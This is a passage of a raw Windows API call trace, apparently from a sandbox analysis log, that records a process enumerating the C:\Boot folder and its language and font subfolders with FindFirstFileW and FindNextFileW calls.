nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.325] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.325] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.325] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.325] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0035.325] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.325] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.325] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.325] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.325] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.325] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.325] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0035.325] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.325] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.325] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.325] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0035.326] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.326] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.326] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0035.326] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.326] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.326] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.326] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.326] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.326] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.326] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0035.326] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.326] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.327] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.327] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.327] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.327] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.327] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0035.327] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.327] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.327] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.327] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.327] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.327] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.327] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0035.327] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.327] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.327] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.328] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.328] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.328] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.328] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0035.328] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.328] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.328] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.328] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.328] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.328] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.328] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0035.328] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.328] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.328] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.329] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.329] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.329] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.329] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0035.329] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.329] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.329] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.329] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.329] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.329] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.329] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0035.329] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.329] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f3038 [0035.329] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.329] FindNextFileW (in: hFindFile=0x6f3038, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0035.330] FindClose (in: hFindFile=0x6f3038 | out: hFindFile=0x6f3038) returned 1 [0035.330] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.330] FindNextFileW (in: hFindFile=0x6f1ff0, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, 